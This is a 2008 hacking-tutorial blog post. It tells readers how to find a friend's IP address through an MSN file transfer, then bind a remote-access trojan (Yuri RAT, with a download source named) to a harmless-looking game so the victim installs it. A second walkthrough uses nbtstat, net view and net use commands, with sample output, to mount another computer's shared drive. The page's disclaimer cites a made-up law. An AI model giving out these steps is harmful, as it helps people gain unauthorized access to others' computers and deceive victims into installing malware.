title 1 Welcome to THE WHITE HACKER TUTORIAL

DISCLAIMER


The creator of this site or the ISP(s) hosting any content on this site take NO responsibility for the wayyou use the information provided on this site. These files and anything else on this site are here for privatepurposes only and SHOULD NOT BE DOWNLOADED OR VIEWED WHATSOEVER! If you areaffiliated with any government, or ANTI-Piracy group or any other related group or were formally aworker of one you CANNOT enter this site, cannot access any of its files and you cannot view any of thefiles. All the objects on this site are PRIVATE property and are not meant for viewing or any otherpurposes other then bandwidth space. DO NOT ENTER whatsoever! If you enter this site you are notagreeing to these terms and you are violating code 431.322.12 of the Internet Privacy Act signed by BillClinton in 1995 and that means that you CANNOT threaten our ISP(s) or any person(s) or companystoring these files.DISCLAIMERDO NOT VIEW THIS SITE IF YOU ARE SEEKING TO PARTICIPATE IN ILLEGAL ACTIVITIES. FURTHER INFO WILL BE PROVIDED AT A LATER DATE REGARDING THE CONSEQUENCES OF ILLEGAL ACTIVITIES STEMMING FROM INFO RECEIVED FROM THIS SITE.This site does not store any files on its server. All contents are provided by non-affiliated third parties.

Friday, June 13, 2008

REMOTE HACKING

Remote Hacking
In this tutorial; you will learn how to access a computer's friend through a simple conversation on MSN. Its quite easy, but most people consider the contents of this document to be more of a 'script kiddie' actions.

Script Kiddie: n00b-hackers who consider themselfes to be powerful because of the tools they have obtained rather then the hard powerful way real hackers use.

But anyways, script kiddies <3> Run... and type 'cmd.exe', type 'netstat -n' whilst sending the file and you will have a list of IP addresses. The first few are yours, now scroll down, and you see his 'foregin IP', write it down on a paper.

Yeah! You got his fricken' IP address! Now, lets perform our hacking!

Hacking Operation

Okay, well you know your friend's IP address. Aint that great? Lets perform our 411-hacking operation! okey: Poke your friend in the heart, yeah!
Okay, I got a bit hyper writing this tutorial till here, now lets continue.

Go to

http://library.2ya.com
and browse to: Trojans/Backdoors >> Trojan Horses >> Yuri RAT.
Now download Yuri RAT. Trojans work as a client/server direct-connection, meaning, you will send the server.exe (binded) with a simple innocent virus-free game, and send it to the victim.
The victim opens it, and starts playing the game, but in the background, a port with listening ears has been opened, you simply open the trojan's client and type his IP address, leave the default port, and click Connect, access granted.

NetWork hacking using DOS

In this step by step guide you will learn about: How to Hack Network Hard Drives using the command prompt.

Things to remember

* CP = Command Prompt
* HDs = Hard Drives

Step by Step:
1. Open command prompt if it's block and you don't know how to get to it go to Using the command prompt under a limited account and then continue to step #2.
2. Once in command prompt type
c:\windows>nbtstat -a 203.195.136.156
(instead of the I.P. address type the real I.P. address or the name of the computer your trying to get to) and if you don't know how to get the name of the computer then go to what to do after hacking the C:\ drive and then continue to step #3.
3. Let say that it gives you this

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6


The number <20> shows that the victim has enabled the File And Printer Sharing.

-------------------------------------

NOTE - If you do not get this number there are three possible answers

A. You do not get the number <20> . This shows that the victim has not enabled the File and Printer Sharing.

B. You get "Host Not found". This shows that the port 139 is closed or the ip address or computer name doesn't exist or the computer you are trying to get to is turned off.
C. its still doesn’t matter if you don't get the <20> because this is to hack hard drives and not printers
4. Now in command prompt type
c:\windows>net view \\203.195.136.156

Let's suppose we get the following output

Shared resources at \\203.195.136.156
The computer's name will be here

Share name Type Used as Comment

-------------------------------------------
CDISK Disk

The command completed successfully.
5. The name CDISK is one of the things that being shared on command prompt type (the word Disk at the side its just saying what the the thing being shared is a printer, disk or a file)
c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter, If the command is successful we will get the confirmation - The command was completed successfully

Now just double click on the My Computer icon on your desktop
and there will be a new drive there with the letter that you replaced K with.

Continue to Hacking network printers with the command prompt